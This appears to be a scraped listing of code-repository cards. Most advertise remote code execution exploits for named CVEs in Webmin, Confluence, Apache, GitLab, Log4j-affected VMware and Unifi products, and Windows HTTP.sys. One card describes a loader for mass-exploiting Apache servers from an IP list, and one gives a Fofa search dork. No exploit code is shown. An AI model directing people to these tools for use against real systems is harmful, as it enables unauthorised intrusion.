Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m

BoofGang 10 Dec 21, 2021
A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

John Hammond 25 Dec 8, 2022
CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

FQ Hsu 63 Dec 30, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

null 3 Dec 4, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

null 81 Dec 20, 2022
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

null 86 Dec 9, 2022
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

null 96 Jan 2, 2023
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

null 96 Dec 14, 2022
JstDoS - HTTP Protocol Stack Remote Code Execution Vulnerability

jstDoS If you are going to skid that, please give credits ! ^^ ¿How works? This

apolo 4 Feb 11, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
A task scheduler with task scheduling, timing and task completion time tracking functions

A task scheduler with task scheduling, timing and task completion time tracking functions. Could be helpful for time management in daily life.

ArthurLCW 0 Jan 15, 2022